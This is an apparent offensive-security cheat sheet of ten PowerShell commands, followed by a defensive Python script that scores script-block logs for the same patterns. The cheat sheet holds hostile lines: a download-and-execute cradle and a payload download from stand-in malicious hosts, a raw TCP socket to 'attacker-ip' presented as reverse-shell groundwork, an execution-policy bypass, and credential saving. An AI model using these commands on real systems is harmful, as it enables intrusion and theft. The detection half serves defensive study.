# 10 Essential PowerShell Commands for Offensive Security

1. **Invoke-WebRequest**\
   Download files from a URL. This can be used to pull malicious payloads.

   ```powershell
   Invoke-WebRequest -Uri "http://malicious-site.com/payload.exe" -OutFile "payload.exe"
   ```
2. **Invoke-Expression (IEX)**\
   Execute strings or scripts, often used for fileless attacks by downloading and running scripts in memory.

   ```powershell
   IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/script.ps1')
   ```
3. **Set-ExecutionPolicy**\
   Change the execution policy to allow running scripts. Useful when bypassing script execution restrictions.

   ```powershell
   Set-ExecutionPolicy Bypass -Scope Process -Force
   ```
4. **Get-WmiObject**\
   Gather detailed information about the target machine, including OS details, hardware specs, and processes.

   ```powershell
   Get-WmiObject -Class Win32_OperatingSystem
   ```
5. **Get-Process**\
   List all running processes. Often used for identifying running services or processes that can be exploited.

   ```powershell
   Get-Process
   ```
6. **Start-Process**\
   Execute a process on the target machine, useful for starting a new payload or running privilege escalation techniques.

   ```powershell
   Start-Process "cmd.exe" -ArgumentList "/c whoami"
   ```
7. **New-Object System.Net.Sockets.TCPClient**\
   Open a raw TCP connection to a remote host. This is the building block of a PowerShell reverse shell; the line below only establishes the socket, it does not yet relay a shell over it.

   ```powershell
   $client = New-Object System.Net.Sockets.TCPClient("attacker-ip", 4444)
   ```
8. **Get-Content**\
   Read the contents of a file. It is typically the first step in collecting sensitive data before exfiltration.

   ```powershell
   Get-Content "C:\sensitive-data.txt"
   ```
9. **Out-File**\
   Write data to a file. Useful for saving stolen credentials or logs.

   ```powershell
   # Note: this writes the PSCredential's formatted view (user name plus a
   # System.Security.SecureString placeholder), not the plaintext password.
   Get-Credential | Out-File "credentials.txt"
   ```
10. **Add-Type**\
    Compile and load C# code directly inside the PowerShell process, enabling the use of advanced .NET functionality or custom code execution without dropping a binary to disk.

    ```powershell
    Add-Type -TypeDefinition @"
    public class Exploit {
        public static void Run() {
            // malicious code
        }
    }
    "@
    [Exploit]::Run()
    ```

> **Note:** The usage of these commands is for educational and authorized testing purposes only. Always ensure you have permission before engaging in offensive security activities.
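From the defender's side, every command above leaves a trace in PowerShell Script Block Logging (Event ID 4104, the `ScriptBlockText` field). The following is an added example, not code from the original page: a small triage script that weights the ten command families listed here and flags script blocks whose combined score crosses a threshold. The rule names, weights, threshold and the sample script blocks are all constructed assumptions for illustration.

```python
import re

# Constructed sample ScriptBlockText values (Event ID 4104), one per logged
# block. These are not real logs from any host.
SAMPLE_SCRIPT_BLOCKS = [
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')",
    "Set-ExecutionPolicy Bypass -Scope Process -Force",
    "$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 4444)",
    "Get-Process | Where-Object { $_.CPU -gt 100 }",
    "Get-ChildItem C:\\Temp | Sort-Object Length",
]

# Each rule pairs a regex with a weight: download-and-execute, policy bypass and
# raw sockets are strong signals on their own; inventory and file cmdlets are
# only meaningful in combination (weights are assumed, tune per environment).
RULES = [
    ("download_cradle",
     re.compile(r"(IEX|Invoke-Expression).*DownloadString|DownloadString.*(IEX|Invoke-Expression)", re.I), 5),
    ("web_download", re.compile(r"Invoke-WebRequest.*-OutFile|Net\.WebClient.*DownloadFile", re.I), 3),
    ("policy_bypass", re.compile(r"Set-ExecutionPolicy\s+(Bypass|Unrestricted)", re.I), 4),
    ("raw_tcp_client", re.compile(r"Net\.Sockets\.TCPClient", re.I), 5),
    ("inline_csharp", re.compile(r"Add-Type\s+-TypeDefinition", re.I), 3),
    ("spawn_process", re.compile(r"Start-Process", re.I), 2),
    ("recon", re.compile(r"Get-WmiObject|Get-Process\b", re.I), 1),
    ("file_io", re.compile(r"Get-Content|Out-File", re.I), 1),
]

ALERT_THRESHOLD = 3  # assumed cut-off; a single benign inventory cmdlet stays below it


def score_block(text):
    """Return (score, [matched rule names]) for one script block."""
    hits = [name for name, rx, _ in RULES if rx.search(text)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits


def triage(blocks, threshold=ALERT_THRESHOLD):
    """Return (score, hits, block) for blocks at or above the threshold, highest first."""
    alerts = []
    for block in blocks:
        score, hits = score_block(block)
        if score >= threshold:
            alerts.append((score, hits, block))
    return sorted(alerts, key=lambda a: a[0], reverse=True)


if __name__ == "__main__":
    for score, hits, block in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{score}] {', '.join(hits)}: {block}")
```

In practice the block list would come from `Get-WinEvent` on the `Microsoft-Windows-PowerShell/Operational` log rather than the constructed list.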
